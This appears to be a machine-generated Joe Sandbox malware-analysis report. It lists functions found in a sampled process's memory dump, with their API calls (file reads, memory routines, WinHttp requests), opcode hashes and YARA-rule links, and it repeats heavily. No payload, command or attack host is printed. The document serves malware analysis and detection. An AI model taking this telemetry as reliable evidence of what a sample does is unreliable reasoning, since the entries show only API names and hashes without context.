CreateFileW.KERNELBASE ref: 002BF8F6
GetFileSize.KERNEL32 ref: 002BF982
ReadFile.KERNEL32 ref: 002BF9CD
CloseHandle.KERNEL32 ref: 002BFA19
memcmp.MSVCRT ref: 002BFB49

Memory Dump Source

Source File: 0000002B.00000002.428181510.00000000002B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000002B.00000002.428154505.00000000002B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435012621.00000000004EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435169570.00000000004EF000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435508812.000000000050C000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435531937.000000000050E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435602607.000000000050F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435646580.0000000000512000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435669617.0000000000513000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_2b0000_fl.jbxd

Similarity

API ID: File$CloseCreateHandleReadSizememcmp
String ID:
API String ID: 3778415394-0
Opcode ID: d022c7fe247589c7023ba4f134bc5c33c63fb053e4aca2da1e81e7e5a607ba13
Instruction ID: 4a83d3c6286d52bddebbab1b0017ae3fb0fb7da9bdebb142dbd1a9c21a0f1ecd
Opcode Fuzzy Hash: d022c7fe247589c7023ba4f134bc5c33c63fb053e4aca2da1e81e7e5a607ba13
Instruction Fuzzy Hash: 662235B09142198FDB64CF58C994BEEB7F4EB48300F1085AEE449AB381DB789E94CF55

Uniqueness

Uniqueness Score: -1.00%

Function 002B1284 Relevance: 5.1, APIs: 4, Instructions: 89stringCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 002B12FB
strlen.MSVCRT ref: 002B132B
malloc.MSVCRT ref: 002B1336
memcpy.MSVCRT ref: 002B134C

Memory Dump Source

Source File: 0000002B.00000002.428181510.00000000002B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000002B.00000002.428154505.00000000002B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435012621.00000000004EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435169570.00000000004EF000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435508812.000000000050C000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435531937.000000000050E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435602607.000000000050F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435646580.0000000000512000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435669617.0000000000513000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_2b0000_fl.jbxd

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: 12b6a58b6d89df6568dd5db75e0f1b5ac8cc5ab8a221144a110736a169d37bd8
Instruction ID: cc458dcdb569693aebad21270a87066a27dfa90e966b3559786fa11e9d75de30
Opcode Fuzzy Hash: 12b6a58b6d89df6568dd5db75e0f1b5ac8cc5ab8a221144a110736a169d37bd8
Instruction Fuzzy Hash: 813179B1A04316CFCB10CFA5D8A539DBBF1BB49384F54862EDA4487312E735A968DF80

Uniqueness

Uniqueness Score: -1.00%

Function 002B12A6 Relevance: 5.1, APIs: 4, Instructions: 79stringCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 002B12FB
strlen.MSVCRT ref: 002B132B
malloc.MSVCRT ref: 002B1336
memcpy.MSVCRT ref: 002B134C

Memory Dump Source

Source File: 0000002B.00000002.428181510.00000000002B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000002B.00000002.428154505.00000000002B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435012621.00000000004EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435169570.00000000004EF000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435508812.000000000050C000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435531937.000000000050E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435602607.000000000050F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435646580.0000000000512000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435669617.0000000000513000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_2b0000_fl.jbxd

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: 27f23cb56ce68f40265d24b2c518609603a4694886dacab5efb88983ab089028
Instruction ID: 6164674cceee68231b26bfbccd16312f4df605cc6c1505ede59f057bf0d4cc7b
Opcode Fuzzy Hash: 27f23cb56ce68f40265d24b2c518609603a4694886dacab5efb88983ab089028
Instruction Fuzzy Hash: DA315571A04716CFCB20DF65D89439DBBF1BB59344F24862EDA4897311E734A959CF80

Uniqueness

Uniqueness Score: -1.00%

Function 004E3A40 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 004E3A55

Part of subcall function 004E3B30: malloc.MSVCRT ref: 004E3B5C

malloc.MSVCRT ref: 004E3AC9

Strings

\aP, xrefs: 004E3A8A

Memory Dump Source

Source File: 0000002B.00000002.428181510.00000000002B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000002B.00000002.428154505.00000000002B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435012621.00000000004EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435169570.00000000004EF000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435508812.000000000050C000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435531937.000000000050E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435602607.000000000050F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435646580.0000000000512000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435669617.0000000000513000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_2b0000_fl.jbxd

Similarity

API ID: malloc
String ID: \aP
API String ID: 2803490479-2372535764
Opcode ID: 12cb0e8aff79c5842e7a86c4f2eec947356b184b448225dce5f28dc2e49064e8
Instruction ID: 709c5b9020e0d7834742f0accef0e39c959e0c560434374b777748f4bb087a18
Opcode Fuzzy Hash: 12cb0e8aff79c5842e7a86c4f2eec947356b184b448225dce5f28dc2e49064e8
Instruction Fuzzy Hash: 3E11D3B12087408FD7117F76CD8532FBAD4AF4034AF41492EE9858B342E77CC6448B9A

Uniqueness

Uniqueness Score: -1.00%

Function 002C33D6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 002C3402

Strings

\, xrefs: 002C33EB

Memory Dump Source

Source File: 0000002B.00000002.428181510.00000000002B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000002B.00000002.428154505.00000000002B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435012621.00000000004EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435169570.00000000004EF000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435508812.000000000050C000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435531937.000000000050E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435602607.000000000050F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435646580.0000000000512000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435669617.0000000000513000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_2b0000_fl.jbxd

Similarity

API ID: _assert
String ID: \
API String ID: 1222420520-2967466578
Opcode ID: 64bb0a9de3ffb130291c345fe385fcf68cea0a92bbb238005a13bed0fb7bb247
Instruction ID: fff4b31f5557f64ac3275c12b774a7575e81aef185d63dbc156fe237fd15f811
Opcode Fuzzy Hash: 64bb0a9de3ffb130291c345fe385fcf68cea0a92bbb238005a13bed0fb7bb247
Instruction Fuzzy Hash: D5D05B70104309ABD700BF64D60551DBEE46B01349F40C82DD6C497240D7B4D444CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 004893A0 Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

_wfopen.MSVCRT ref: 00489428

Memory Dump Source

Source File: 0000002B.00000002.428181510.00000000002B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000002B.00000002.428154505.00000000002B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435012621.00000000004EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435169570.00000000004EF000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435508812.000000000050C000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435531937.000000000050E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435602607.000000000050F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435646580.0000000000512000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435669617.0000000000513000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_2b0000_fl.jbxd

Similarity

API ID: _wfopen
String ID:
API String ID: 3448808716-0
Opcode ID: e7c407f9a903875d8507f75ed18a8860e6a0d86f252c62c18e62bb133926c3ff
Instruction ID: 1fb75ad8dbe816e9ab5d1ab551f745258700060ca8908746bd9261b6680c1e5a
Opcode Fuzzy Hash: e7c407f9a903875d8507f75ed18a8860e6a0d86f252c62c18e62bb133926c3ff
Instruction Fuzzy Hash: 1531E7B190C65186DF249E28984137FB7A1AF75705F8C885BDCC5C7346E22E8D47835A

Uniqueness

Uniqueness Score: -1.00%

Function 00489510 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00489533

Memory Dump Source

Source File: 0000002B.00000002.428181510.00000000002B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000002B.00000002.428154505.00000000002B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435012621.00000000004EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435169570.00000000004EF000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435508812.000000000050C000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435531937.000000000050E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435602607.000000000050F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435646580.0000000000512000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435669617.0000000000513000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_2b0000_fl.jbxd

Similarity

API ID: fclose
String ID:
API String ID: 3125558077-0
Opcode ID: e05bc7d7a17e1268126d2af2c600b68c02f03406ebe028b51b6416b29e436288
Instruction ID: 4528020416cf32e22df782f9505fee6b7688df992ed360bcb6e981fd59673f81
Opcode Fuzzy Hash: e05bc7d7a17e1268126d2af2c600b68c02f03406ebe028b51b6416b29e436288
Instruction Fuzzy Hash: 68E04FF6B066005BEF127E799C8131A7BD45B02209FAC44EEE808CB342F33ACD119785

Uniqueness

Uniqueness Score: -1.00%

Function 002C4274 Relevance: 1.4, APIs: 1, Instructions: 106stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 002C42C5

Memory Dump Source

Source File: 0000002B.00000002.428181510.00000000002B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000002B.00000002.428154505.00000000002B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435012621.00000000004EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435169570.00000000004EF000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435508812.000000000050C000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435531937.000000000050E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435602607.000000000050F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435646580.0000000000512000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435669617.0000000000513000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_2b0000_fl.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 7d12b8b8befe8d5fcb0001ce54f1ff56bf4521cdee3c82c4307b22a2cea8a4ed
Instruction ID: 71d34707ad8b7c035973a72dd0b8e16bd8e1e90ff00a163b506b769149102c05
Opcode Fuzzy Hash: 7d12b8b8befe8d5fcb0001ce54f1ff56bf4521cdee3c82c4307b22a2cea8a4ed
Instruction Fuzzy Hash: 7F51A1B49042489FCB10EFA8C485B9EBBF0FF48304F14895EE899AB345D7B89985CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00375883 Relevance: 1.3, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

free.MSVCRT(?,?,00000000,?,0038A665,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0037590E

Memory Dump Source

Source File: 0000002B.00000002.428181510.00000000002B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000002B.00000002.428154505.00000000002B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435012621.00000000004EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435169570.00000000004EF000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435508812.000000000050C000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435531937.000000000050E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435602607.000000000050F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435646580.0000000000512000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435669617.0000000000513000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_2b0000_fl.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: eeae78d73ded43389d1fb47633463b3ca9bbf555ac049fddf31702ce3138ddda
Instruction ID: 8d7934825eb2b84d5a01b15d3e4b9b131a5eb74e9238e58d8caca868439e0609
Opcode Fuzzy Hash: eeae78d73ded43389d1fb47633463b3ca9bbf555ac049fddf31702ce3138ddda
Instruction Fuzzy Hash: E201E171208504EFE319AF58F8C453637A9E711320F24803FE94A8FB92DB7D9945D796

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 003F9090 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 336stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 003F9103
strlen.MSVCRT ref: 003F921C
strlen.MSVCRT ref: 003F92A8

Strings

_GLOBAL_, xrefs: 003F90BD

Memory Dump Source

Source File: 0000002B.00000002.428181510.00000000002B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000002B.00000002.428154505.00000000002B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435012621.00000000004EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435169570.00000000004EF000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435508812.000000000050C000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435531937.000000000050E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435602607.000000000050F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435646580.0000000000512000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435669617.0000000000513000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_2b0000_fl.jbxd

Similarity

API ID: strlen
String ID: _GLOBAL_
API String ID: 39653677-770460502
Opcode ID: fd5d41c545cf2446a2a159c72410585fa8732fc692d3687b67223cf79d220d81
Instruction ID: 48408f358cb907735a871c9507fdf8349b4dc0d6263a06de004132c4dff22934
Opcode Fuzzy Hash: fd5d41c545cf2446a2a159c72410585fa8732fc692d3687b67223cf79d220d81
Instruction Fuzzy Hash: B3E1B17190426D8FEB26CF29C8943FDBBF1AB05304F4541AAD64D9B356D7398A8ACF40

Uniqueness

Uniqueness Score: -1.00%

Function 0041E320 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 208fileCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0041E391
fwrite.MSVCRT ref: 0041E544

Part of subcall function 003F9B20: strlen.MSVCRT ref: 003F9BA5
Part of subcall function 003F9B20: memcpy.MSVCRT ref: 003F9BC0
Part of subcall function 003F9B20: free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 003F9BCA

fwrite.MSVCRT ref: 0041E474
fputs.MSVCRT ref: 0041E4A1
fwrite.MSVCRT ref: 0041E4D6
free.MSVCRT ref: 0041E4EA
fputs.MSVCRT ref: 0041E50D
abort.MSVCRT ref: 0041E551
fwrite.MSVCRT ref: 0041E586
abort.MSVCRT ref: 0041E58B
fwrite.MSVCRT ref: 0041E5F8
fputs.MSVCRT ref: 0041E615
fputc.MSVCRT ref: 0041E632

Strings

-, xrefs: 0041E529
not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugs/): , xrefs: 0041E339

Memory Dump Source

Source File: 0000002B.00000002.428181510.00000000002B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000002B.00000002.428154505.00000000002B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435012621.00000000004EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435169570.00000000004EF000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435508812.000000000050C000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435531937.000000000050E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435602607.000000000050F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435646580.0000000000512000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435669617.0000000000513000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_2b0000_fl.jbxd

Similarity

API ID: fwrite$fputs$abortfreememcpy$fputcstrlen
String ID: -$not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugs/):
API String ID: 1586115568-2342464244
Opcode ID: 052a304f0e4e211d5dd2a361e8d11818edc42136ed5c17261d4b412cc834c3a8
Instruction ID: 36d1be2e76611afc0200206a1c44e3ec31476765d2d09b8e9eef745d59210266
Opcode Fuzzy Hash: 052a304f0e4e211d5dd2a361e8d11818edc42136ed5c17261d4b412cc834c3a8
Instruction Fuzzy Hash: 2791E5B55083419FC310EF69C44975EBBE0BF85318F008A6EE4E89B392D77999848B57

Uniqueness

Uniqueness Score: -1.00%

Function 0041A304 Relevance: 16.9, APIs: 11, Instructions: 360COMMON

Download Yara Rule

APIs

Part of subcall function 002B85EA: strlen.MSVCRT ref: 002B8631

WinHttpSendRequest.WINHTTP ref: 0041A4F2
WinHttpReceiveResponse.WINHTTP(?), ref: 0041A50E
WinHttpQueryDataAvailable.WINHTTP(?,?,?), ref: 0041A56C
WinHttpReadData.WINHTTP(?,?,?,?,?), ref: 0041A5F3

Part of subcall function 004BA130: strlen.MSVCRT ref: 004BA169

WinHttpQueryHeaders.WINHTTP(?,?,?), ref: 0041A723
WinHttpQueryHeaders.WINHTTP ref: 0041A755
GetLastError.KERNEL32 ref: 0041A75D
WinHttpQueryHeaders.WINHTTP ref: 0041A830

Memory Dump Source

Source File: 0000002B.00000002.428181510.00000000002B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000002B.00000002.428154505.00000000002B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435012621.00000000004EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435169570.00000000004EF000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435508812.000000000050C000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435531937.000000000050E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435602607.000000000050F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435646580.0000000000512000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435669617.0000000000513000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_2b0000_fl.jbxd

Similarity

API ID: Http$Query$Headers$Datastrlen$AvailableErrorLastReadReceiveRequestResponseSend
String ID:
API String ID: 4152589554-0
Opcode ID: 610e9ed4d4e54af21764a03f51559383cd7187741007a8fa374011efa00e1b38
Instruction ID: ee5796145b467cd7bb0f2d0c1d31e4473cfad711eb34a45f3acfd5f3c03d7c45
Opcode Fuzzy Hash: 610e9ed4d4e54af21764a03f51559383cd7187741007a8fa374011efa00e1b38
Instruction Fuzzy Hash: 68C18EB16092009BE704DF18D584AAA77E5EBC4310F20892EF999CB385D63CDD968B57

Uniqueness

Uniqueness Score: -1.00%

Function 0041B330 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 153COMMON

Download Yara Rule

APIs

WinHttpConnect.WINHTTP ref: 0041B42C
WinHttpOpenRequest.WINHTTP ref: 0041B49D
WinHttpSetOption.WINHTTP ref: 0041B520

Strings

?, xrefs: 0041B4E9

Memory Dump Source

Source File: 0000002B.00000002.428181510.00000000002B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000002B.00000002.428154505.00000000002B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435012621.00000000004EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435169570.00000000004EF000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435508812.000000000050C000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435531937.000000000050E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435602607.000000000050F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435646580.0000000000512000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435669617.0000000000513000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_2b0000_fl.jbxd

Similarity

API ID: Http$ConnectOpenOptionRequest
String ID: ?
API String ID: 2787285973-1684325040
Opcode ID: faf2f787f3452c48cfde833adbea7d5d264735a0b4256d607b74336d481e0fc0
Instruction ID: 21e1c37991c8f3e63206d35b4f333636038f19c07c2e79437f7b0bfe13ce659b
Opcode Fuzzy Hash: faf2f787f3452c48cfde833adbea7d5d264735a0b4256d607b74336d481e0fc0
Instruction Fuzzy Hash: 865162B19086089FD700DF59D9446AFBBF4EB84310F20C92FE459DB381D73895868B56

Uniqueness

Uniqueness Score: -1.00%

Function 003A8302 Relevance: 6.4, APIs: 3, Strings: 1, Instructions: 390COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 003A84D8
memcmp.MSVCRT ref: 003A8680
memcmp.MSVCRT ref: 003A87E2

Strings

0, xrefs: 003A87C8

Memory Dump Source

Source File: 0000002B.00000002.428181510.00000000002B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000002B.00000002.428154505.00000000002B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435012621.00000000004EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435169570.00000000004EF000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435508812.000000000050C000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435531937.000000000050E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435602607.000000000050F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435646580.0000000000512000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435669617.0000000000513000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_2b0000_fl.jbxd

Similarity

API ID: memcmp
String ID: 0
API String ID: 1475443563-4108050209
Opcode ID: 5a95092ba1e518ac7e54054d7dc532a4ab874fa053676806a92fd9dfa6abec8f
Instruction ID: b1d6491b3b541ebb4e20fbb12024d5ccd5d4fb5193010340685e7098e5be7222
Opcode Fuzzy Hash: 5a95092ba1e518ac7e54054d7dc532a4ab874fa053676806a92fd9dfa6abec8f
Instruction Fuzzy Hash: 33F10174E042198FDB11DFA8C480A9DB7F1EF4A314F268569E858EB365DB30EC46CB40

Uniqueness

Uniqueness Score: -1.00%

Function 004E4020 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 172COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 004E40BD

Strings

N, xrefs: 004E416F
N, xrefs: 004E4250
N, xrefs: 004E4257

Memory Dump Source

Source File: 0000002B.00000002.428181510.00000000002B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000002B.00000002.428154505.00000000002B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435012621.00000000004EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435169570.00000000004EF000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435508812.000000000050C000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435531937.000000000050E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435602607.000000000050F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435646580.0000000000512000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435669617.0000000000513000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_2b0000_fl.jbxd

Similarity

API ID: malloc
String ID: N$N$N
API String ID: 2803490479-2402964754
Opcode ID: 4263b6e98ddbdc7735006982902510797d8699eedcb4f98ef9b00e56cd3b1a44
Instruction ID: 7d77173822c95833761c61b3a7907fc7e3e95131620e3031a526951cf96a01ef
Opcode Fuzzy Hash: 4263b6e98ddbdc7735006982902510797d8699eedcb4f98ef9b00e56cd3b1a44
Instruction Fuzzy Hash: E9619BB06092818FEB40DF57D484B2BBBE0BF8430AF45956EE6468B361D73CD844CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 002B101A Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 002B1075
__p__fmode.MSVCRT ref: 002B107A
__p__commode.MSVCRT ref: 002B1087

Memory Dump Source

Source File: 0000002B.00000002.428181510.00000000002B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000002B.00000002.428154505.00000000002B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435012621.00000000004EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435169570.00000000004EF000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435508812.000000000050C000.00000004.00000001.01000000.0000000E.sdmpDownload File
